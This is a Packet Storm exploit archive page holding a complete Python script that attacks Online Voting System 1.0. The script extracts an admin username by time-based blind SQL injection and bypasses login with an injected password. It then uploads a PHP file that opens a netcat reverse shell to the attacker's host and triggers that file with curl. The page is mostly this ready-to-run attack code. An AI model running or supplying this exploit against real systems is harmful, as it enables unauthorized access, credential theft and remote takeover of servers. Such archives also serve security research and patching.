exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Online Voting System 1.0 SQL Injection / Remote Code Execution

Online Voting System 1.0 SQL Injection / Remote Code Execution
Posted Jul 5, 2021
Authored by Geiseric

Online Voting System version 1.0 remote SQL injection to code execution exploit. This is a variant exploit based off of the original discovery by deathflash1411 in July of 2021.

tags | exploit, remote, code execution, sql injection
SHA-256 | 3ff5e07eb42ef2116755a72245e4a865eade38a1b8620e3d8abcc7ea7332aab4

Online Voting System 1.0 SQL Injection / Remote Code Execution

Change Mirror Download
# Exploit Title: Online Voting System 1.0 - SQLi (Authentication Bypass) + Remote Code Execution (RCE)
# Exploit Author: Geiseric
# Original Exploit Author: deathflash1411 - https://www.exploit-db.com/exploits/50076 - https://www.exploit-db.com/exploits/50075
# Date 02.07.2021
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/4808/voting-system-php.html
# Version 1.0
# Tested on: Ubuntu 20.04

import requests
import os
import sys
from requests_toolbelt.multipart.encoder import MultipartEncoder
import string
import random




if len(sys.argv) < 4:
print('[+] Usage: python3 ovsploit.py http://<ip> <your ip> <your port>')
exit()

url = sys.argv[1]
attacker_ip = sys.argv[2]
attacker_port = sys.argv[3]


exp_url = '/Online_voting_system/admin/save_candidate.php'
login_url = '/Online_voting_system/admin/'


def first_get():

r = requests.get(url+login_url)
return r.headers['Set-Cookie']


def retrieve_first_admin():
print("[!] Stage 1: Finding a valid admin user through SQL Injection")
cookie = first_get()
count = 0
i=1
flag = True
admin = ''
while flag:
for j in range(32,128):
r = requests.post(url+login_url,data={'UserName': """aasd' AND (SELECT 7303 FROM (SELECT(SLEEP(1-(IF(ORD(MID((SELECT IFNULL(CAST(UserName AS NCHAR),0x20) FROM users WHERE User_Type = "admin" LIMIT 0,1),"""+str(i)+""",1))="""+str(j)+""",0,1)))))PwbW)-- qRBs""",'Password': 'asd','Login':''},headers={"Cookie":cookie})
if (r.elapsed.total_seconds() > 1):
admin += chr(j)
i+=1
sys.stdout.write("\rAdmin User: "+ admin)
sys.stdout.flush()
count=0
else:
if count == 100:
flag = False
break
else:
count += 1
print("\n[+] First admin user found!")
print("[!] Starting Stage 2")
return admin




def id_generator(size=6, chars=string.ascii_lowercase):
return ''.join(random.choice(chars) for _ in range(size))+'.php'



def login_bypass(cookie):
username = retrieve_first_admin()
print("[!] Stage 2 started: Bypassing Login...")
r = requests.post(url+login_url,data={'UserName': username,'Password': "' or ''='",'Login':''}, headers={'Cookie':cookie})
return cookie



def rev_write():
name = id_generator()
f = open(name,'w')
f.write('<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc ' +attacker_ip+ " " + attacker_port+' >/tmp/f"); ?>')
f.close()
print('[+] Generated file with reverse shell: ' +name)
return name


def exploit(cookie):
print("[+] Uploading reverse shell...")
filename=rev_write()
multipart_data = MultipartEncoder(

{
# a file upload field
'image': (filename, open(filename, 'rb'), 'application/x-php'),
# plain text fields
'user_name': 'admin',
'rfirstname': 'test',
'rlastname': 'test',
'rgender': 'Male',
'ryear': '1st year',
'rmname': 'test',
'rposition': 'Governor',
'party': 'test',
'save': 'save'
}
)
r = requests.post(url+exp_url, data=multipart_data, headers={'Content-Type': multipart_data.content_type, 'Cookie':cookie})
return filename




filename = exploit(login_bypass(first_get()))
print("[!] Triggering...")
input('[+] Please start a listener on port ' + attacker_port +' then press Enter to get shell.')
os.system('curl '+url+'/Online_voting_system/admin/upload/'+filename+' -m 1 -s')
print("[+] Cleaning up!")

os.system("rm "+ filename)

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close